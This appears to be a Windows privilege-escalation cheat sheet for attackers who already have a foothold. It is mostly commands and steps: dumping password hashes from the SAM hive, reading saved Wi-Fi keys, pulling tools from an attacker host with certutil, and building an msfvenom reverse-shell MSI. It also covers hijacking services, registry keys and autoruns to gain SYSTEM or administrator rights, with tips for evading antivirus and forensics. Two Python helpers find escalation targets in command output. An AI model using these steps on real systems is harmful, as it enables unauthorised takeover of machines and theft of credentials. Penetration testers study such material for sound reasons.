Windows Privilege Escalation
🔥 These are the steps to take after gaining access:
MANUAL Enumeration:
🔥 1- System Enumeration (cmd)
systeminfo
⇒ get all information about the system
systeminfo | findstr /C:"OS Name" /C:"OS Version" /C:"System Type"
⇒ only the OS name, version and architecture (the lines a kernel-exploit search needs)
wmic qfe
⇒ (Windows Management Instrumentation Command, Quick Fix Engineering) ⇒ display a detailed list of all updates (hotfixes/KBs) installed on this Windows system
🔥 2- User Enumeration
whoami
⇒ get the current user on the machine
whoami /priv
⇒ get the privileges of the current user
whoami /groups
⇒ get the groups the user is in
net user
⇒ get all local users on the machine
net user noby
⇒ get all information about the user noby
net localgroup administrators
⇒ get the members of the local Administrators group
🔥 3- Network Enumeration
ipconfig /all
⇒ get the full network configuration of the machine (interfaces, IP addresses, DNS, gateway, domain)
arp -a
⇒ get the ARP table, which maps IP addresses to MAC addresses (ARP is the protocol that resolves IP to MAC), so we learn which other hosts this machine talks to
netstat -ano
⇒ get all listening ports and connections on this machine together with the owning PID. We can use this for port forwarding, and sometimes we see ports that did not appear in our scan because they only listen on localhost for an internal service
netsh wlan show profile
⇒ list the saved Wi-Fi profiles on this machine
netsh wlan show profile Elnoby key=clear
⇒ get the password of the (Elnoby) Wi-Fi profile in clear text
🔥 Firewall & AV Configuration:
sc query
⇒ list the running services on the machine so we know the service names (sc ⇒ Service Control; use sc query state= all to include stopped services)
sc query windefend
⇒ check whether the Windows Defender (AV) service is RUNNING or STOPPED
netsh firewall show state
⇒ get the state of the firewall
netsh firewall show config
⇒ get all firewall configuration
(netsh firewall is deprecated; on current Windows use netsh advfirewall show allprofiles for the same information)
🔥 Automate:
winPEAS
⇒ get all information about the target, but it needs .NET version 4.0 or greater
Windows Exploit Suggester
⇒ runs the target's systeminfo against a database of Microsoft security bulletins to look for any missing patch with a known privesc exploit. Steps:
save the output of systeminfo into a .txt file
./windows-exploit-suggester.py --update
⇒ update the DB of exploits (downloads the bulletin spreadsheet, e.g. 2014-06-06-mssb.xlsx)
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
Privilege Escalation and the most common techniques
🔥 1- Kernel Exploits: after getting access
😎 Manual:
1. create the payload (the compiled exploit) and get it onto the target: send it directly, upload it to an FTP server, serve it from a web server, ... then execute it
2. use Windows Exploit Suggester to find which exploit applies (same as in Automate above: save systeminfo to a .txt file, then)
python2.7 windows-exploit-suggester.py --update
⇒ update the DB of exploits
python2.7 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
3. search for the suggested bulletin/exploit in Exploit-DB
Auto
1. Metasploit module:
run post/multi/recon/local_exploit_suggester
use the background command to get back to the Metasploit console, then use the recommended exploit with
use exploit_name
and set our options
🔥 2- Password Hunting:
🤩
findstr /si password *.txt *.ini *.config
⇒ recursively search all .txt, .ini and .config files for the string "password" (case-insensitive)
.config files
⇒ passwords are often found in configuration files, such as database connection strings (web.config, SQL configs and so on)
😃
look for passwords in the registry:
reg query HKLM /f password /t REG_SZ /s   # look for registry values under HKLM that contain "password"
reg query HKCU /f password /t REG_SZ /s   # look for registry values under HKCU that contain "password"
Steps for Privilege (dumping the local hashes):
1. copy the SAM and SYSTEM files (registry hives) to Kali
2. use creddump to extract the hashes from them (pwdump.py SYSTEM SAM)
🔥 3- Port Forwarding from Windows to Kali:
1. upload plink.exe from Kali to Windows with cmd:
certutil -urlcache -f http://myip:port/plink64.exe plink64.exe
(e.g. http://10.0.0.249:8000/plink64.exe)
2. start the SSH server on Kali:
service ssh start
3. run plink.exe from cmd:
plink.exe -l root -pw <kali_password> -R <port_to_open_on_kali>:127.0.0.1:<port_on_windows> <my_kali_ip>
⇒ -R opens a listening port on Kali that is tunnelled back to 127.0.0.1:<port_on_windows> on the Windows box, so a service that only listens on localhost can be reached from Kali. The Kali sshd must allow password login for that user (root login is disabled by default; use a normal user or enable it in sshd_config).
🔥 4- Token Impersonation and Potato Attacks
Tokens:
a temporary key that allows you to access the network/system without entering your credentials every time (to access files, ...), like a cookie. There are 2 types:
Delegate tokens: created for an interactive logon to the machine or over RDP
Impersonate tokens: non-interactive, such as attaching a network drive or running a domain logon script
Steps:
whoami /priv
The most dangerous privileges are:
SeImpersonatePrivilege
⇒ the process can impersonate any other user's token, such as Administrator or SYSTEM; this is what the potato family abuses to privesc to SYSTEM, using tools such as potato.exe, rottenpotato.exe and juicypotato.exe
SeAssignPrimaryTokenPrivilege
⇒ assign an access token to a new process. Can also be exploited with JuicyPotato
SeBackupPrivilege
⇒ lets the user read any file regardless of its ACL, which means the user can copy the SAM and SYSTEM registry hives and extract the password hashes, which can then be used in a pass-the-hash attack
SeRestorePrivilege
⇒ lets the user write any file regardless of its ACL, so they can replace service binaries or DLLs and modify registry settings
Exploitation
after getting access to the target we can use these commands in Meterpreter:
load the extension with
load incognito
(older Metasploit versions: use incognito)
list the available tokens with:
list_tokens -u
impersonate a token by username (escape the backslash):
impersonate_token "DOMAIN\\Admin"
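The privilege checks above are easy to do by eye on one box, but on many shells it helps to parse `whoami /priv` mechanically. The following is an added example (not code from the original notes): it parses the table whoami /priv prints, maps the privileges discussed in this section to the technique that abuses them, and keeps disabled privileges in the result, since a privilege that is present but "Disabled" can still be enabled by the process that holds it. The sample output is constructed, and the mapping of privilege to technique is this page's, not an exhaustive list.

```python
"""Flag privilege-escalation candidates in `whoami /priv` output.

Added example, not from the original notes. The SAMPLE text below is a
constructed whoami /priv table.
"""
import re

# Privilege -> technique that abuses it (follows the section above).
DANGEROUS = {
    "SeImpersonatePrivilege": "token impersonation (JuicyPotato / RottenPotato / incognito)",
    "SeAssignPrimaryTokenPrivilege": "assign token to a new process (JuicyPotato)",
    "SeBackupPrivilege": "read SAM/SYSTEM hives, dump hashes, pass-the-hash",
    "SeRestorePrivilege": "overwrite service binaries / DLLs / registry",
    "SeDebugPrivilege": "inject into a SYSTEM process (getsystem -t 3)",
}

# One table row: privilege name, free-text description, then the state column.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_privs(text):
    """Return {privilege_name: (description, enabled_bool)} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = (m.group(2).strip(), m.group(3) == "Enabled")
    return privs


def privesc_candidates(text):
    """List (privilege, enabled, technique) for every dangerous privilege in the token.

    Disabled privileges are reported too: "Disabled" only means the privilege
    is not currently active; the process can turn it on with
    AdjustTokenPrivileges, so it is still exploitable.
    """
    privs = parse_privs(text)
    return [(p, privs[p][1], DANGEROUS[p]) for p in DANGEROUS if p in privs]


def potato_ready(text):
    """True when the token holds a privilege the potato family needs."""
    privs = parse_privs(text)
    return any(p in privs for p in ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"))


# Constructed sample, typical of a service account shell (e.g. IIS).
SAMPLE = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    for priv, enabled, technique in privesc_candidates(SAMPLE):
        state = "Enabled" if enabled else "Disabled"
        print(f"{priv:<32} {state:<9} -> {technique}")
    print("potato candidate:", potato_ready(SAMPLE))
```

Feed it the saved output of whoami /priv from each shell; anything it returns is worth a closer look before falling back to kernel exploits.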
🔥 5- getsystem techniques (Meterpreter)
1. Named Pipe Impersonation (In Memory/Admin): here we impersonate to go from the current (admin) user to SYSTEM
  1. Meterpreter creates a named pipe and creates a service that runs cmd.exe
  2. the spawned cmd.exe (running as SYSTEM under the service) connects to Meterpreter's named pipe
  3. Meterpreter impersonates the security context of that client, so it now runs as SYSTEM
2. Named Pipe Impersonation (Dropper/Admin): like technique 1, but this technique drops a DLL to disk(!) and schedules rundll32.exe as a service to run the DLL as SYSTEM
  1. it creates a named pipe and impersonates the security context of the first client to connect to it
  2. the client is the dropped DLL, run by rundll32.exe as a SYSTEM service
😜 NOTE THAT this technique drops a file to disk, which can be caught by AV. If you need to avoid anti-virus or must not leave forensic evidence, don't use getsystem -t 0 (it tries every technique, including this one) and avoid getsystem -t 2.
3. Token Duplication (In Memory/Admin): this technique requires SeDebugPrivilege (check with whoami /priv)
  1. it loops through all open services to find one running as SYSTEM that it has permission to inject into
  2. it uses reflective DLL injection to run its elevator.dll in the memory space of that service, passing Meterpreter's thread id to elevator.dll
  3. elevator.dll grabs the SYSTEM token, opens the primary thread in Meterpreter and applies the SYSTEM token to it
😛 This technique limits itself to x86 environments only, and it takes place entirely in memory.
🔥 6- RUNAS:
allows us to run a command as another user, possibly an administrator, using credentials saved in the Windows Credential Manager
After getting a shell, follow these steps to escalate privileges:
1. list the saved credentials:
cmdkey /list
2. if an entry for an administrator exists, run cmd as that user with the saved credential:
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe"
⇒ /savecred only works if the credential was stored earlier by that user. From a reverse shell the new cmd.exe opens in its own window that we cannot see, so run a reverse-shell executable instead of cmd.exe to get the elevated session back on the listener.
💡 7- Registry:
1. AutoRuns: Windows can be configured to run commands at startup, with the privileges of the user who logs in. AutoRuns are configured in the Registry. If you are able to write to an AutoRun executable, and are able to restart the system (or wait for an admin to log in), you may be able to escalate privileges.
Steps to check it: run this in cmd:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
it lists the auto-run programs. Use accesschk.exe on every path we see to show whether we can write to it or not:
.\accesschk.exe /accepteula -wvu "PATH"
if we can write to the path, we replace the exe with our shell:
move the original exe to Temp (keep a backup to restore later)
copy /Y "PATH of SHELL" "C:\Program Files\Autorun Program\program.exe"
😃 Note: the payload runs with the privileges of the next user who logs in, so this only gives admin if an administrator logs in (for example after a reboot on a box with auto-login).
2. AlwaysInstallElevated: a policy that makes Windows Installer install any .msi package with elevated (SYSTEM) privileges.
Steps for it manually:
1. check these 2 registry values; both must be 1 for the attack to work:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
2. create a new reverse shell with msfvenom using the msi format, and save it with the .msi extension:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi
3. copy reverse.msi across to Windows, start a listener, then run the .msi file:
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
😐 Note: msiexec is the Windows Installer command-line tool; /i installs the package and /quiet /qn runs it with no UI.
we can do it automatically with:
exploit/windows/local/always_install_elevated
💡 8- Startup Applications:
programs placed in the all-users StartUp folder run whenever any user logs on
Steps:
1. check the permissions on the StartUp folder:
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
2. from the output we see who can write to the folder (look for (F), (M) or (W) for our user, Users or Everyone) and which programs already run at startup
3. create a new shell and put it (or a shortcut to it) in the StartUp folder
4. start a listener in msfconsole
5. wait for an administrator to log on (or restart the system) and take the shell; it runs with that user's privileges
💡 9- Services:
1. Binary Paths / Insecure Service Permissions: here we look for a service whose configuration we are allowed to modify; we change its binary path and restart the service so the command runs as the service account, and use it to add our user into the Administrators group
Steps: Auto
1. use module ⇒ exploit/windows/local/service_permissions
Steps: manual
1. enumerate with winPEAS, PowerUp or sc query
2. check which services Everyone (or our user) can modify:
accesschk.exe -uvwc Everyone *
3. run accesschk against the service to check our permissions (we need SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS):
accesschk.exe -uvwc <service>
4. show the configuration of the service (note SERVICE_START_NAME, which should be LocalSystem):
sc qc <service>
5. change the configuration of the service (the space after binPath= is required):
sc config <service> binPath= "net localgroup administrators noby /add"
then restart it: sc stop <service> and sc start <service> (or net start <service>). The start reports an error because the command is not a real service binary, but it has already run as the service account.
6. check the change in the group:
net localgroup administrators
⇒ success
2. Unquoted Service Path: a service whose binary path contains spaces and is not enclosed in quotes, e.g. C:\Program Files\Some Service\Common Files\service.exe. Windows then tries C:\Program.exe, C:\Program Files\Some.exe, C:\Program Files\Some Service\Common.exe, ... before the real binary, so if we can write to one of those directories our file runs as the service account.
Steps: Auto
use module:
use exploit/windows/local/trusted_service_path
(this is the Metasploit module name for unquoted service paths)
Steps: Manual
1. enumerate with winPEAS, PowerUp or sc query
2. choose a service that runs with SYSTEM privileges and query it to show its configuration:
sc qc <service>
3. make another payload and put it one directory back in the path: with the example above, put it in C:\Program Files\Some Service\ next to the Common Files folder and name it Common.exe
4. start a listener in msfconsole and start the service:
net start <service>
5. in meterpreter:
getuid
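The lookup order that makes an unquoted path exploitable is easy to get wrong by hand when the path has several spaces. The following is an added example (not code from the original notes): it parses concatenated `sc qc` output, skips quoted paths and paths without spaces, strips service arguments, and lists, in order, the file names Windows would try before the real binary, which are exactly the files we would drop in step 3. It also skips paths under C:\Windows as an assumption that those directories are not writable by our user. The sample output and its service names are constructed.

```python
"""Find unquoted service paths in `sc qc` output and list the hijack candidates.

Added example, not from the original notes. SAMPLE is constructed sc qc output
for three hypothetical services.
"""
import re

# One "KEY : value" line of sc qc output; only the three fields we need.
FIELD = re.compile(r"^\s*(SERVICE_NAME|BINARY_PATH_NAME|SERVICE_START_NAME)\s*:\s*(.*?)\s*$")


def parse_sc_qc(text):
    """Parse one or more concatenated `sc qc <service>` outputs.

    Returns a list of {"name", "path", "account"} dicts.
    """
    services, cur = [], None
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue
        key, val = m.groups()
        if key == "SERVICE_NAME":
            cur = {"name": val, "path": "", "account": ""}
            services.append(cur)
        elif cur is not None and key == "BINARY_PATH_NAME":
            cur["path"] = val
        elif cur is not None and key == "SERVICE_START_NAME":
            cur["account"] = val
    return services


def executable_part(binary_path):
    """Drop service arguments: keep the text up to and including the first .exe."""
    m = re.match(r"(.*?\.exe)\b", binary_path, re.IGNORECASE)
    return m.group(1) if m else binary_path


def hijack_candidates(binary_path):
    """Files Windows tries, in order, before the real binary of an unquoted path.

    For C:\\Program Files\\Foo Bar\\svc.exe CreateProcess tries C:\\Program.exe,
    then C:\\Program Files\\Foo.exe, then the real file. If we can write to the
    directory of any candidate, our file runs as the service account.
    Returns [] when the path is quoted or has no spaces (not vulnerable).
    """
    exe = executable_part(binary_path.strip())
    if exe.startswith('"') or " " not in exe:
        return []
    # Assumption: directories under C:\Windows are not writable by our user,
    # so services there are not a realistic target and are skipped.
    if exe.lower().startswith("c:\\windows\\"):
        return []
    tokens = exe.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def audit(text):
    """{service: (account, [candidate paths])} for every vulnerable service."""
    found = {}
    for svc in parse_sc_qc(text):
        cands = hijack_candidates(svc["path"])
        if cands:
            found[svc["name"]] = (svc["account"], cands)
    return found


# Constructed sample: a quoted path (safe), an unquoted one, and one with arguments.
SAMPLE = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: foosvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Foo Bar\svc.exe -k netsvc
        SERVICE_START_NAME : NT AUTHORITY\LocalService
"""

if __name__ == "__main__":
    for name, (account, cands) in audit(SAMPLE).items():
        print(f"{name} (runs as {account}):")
        for c in cands:
            print("   would try", c)
```

The first candidates (C:\Program.exe, C:\Program Files\X.exe) are rarely writable; the interesting ones are deeper, inside the application's own folder, and those are the directories to check with accesschk or icacls before dropping the payload.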
3. Insecure Service Executables: this attack depends on replacing a service executable that runs as SYSTEM with our payload
Steps: Auto
use module ⇒ exploit/windows/local/service_permissions
Steps: Manual
1. enumerate with winPEAS or PowerUp
2. look for a service executable that is modifiable by everyone
3. use accesschk to show whether it is writable by Everyone (or our user):
.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
4. create a backup of the original service executable in the temp directory
5. copy our payload over the service executable
6. start a listener in Kali and start the service:
net start file_service
4. Weak Registry Permissions: the registry stores an entry for each service under HKLM\SYSTEM\CurrentControlSet\Services; if the key's ACL is misconfigured we can modify the service configuration (ImagePath) even without permissions on the service object itself
Steps:
1. enumerate with winPEAS or PowerUp
2. use accesschk to check whether the key is modifiable (-k tells accesschk the target is a registry key):
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
3. then read the current values of that key, including ImagePath, the binary the service runs:
reg query HKLM\SYSTEM\CurrentControlSet\services\regsvc
4. overwrite ImagePath to point at our reverse shell:
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d <new_shell_path> /f
5. start a listener && the service:
net start regsvc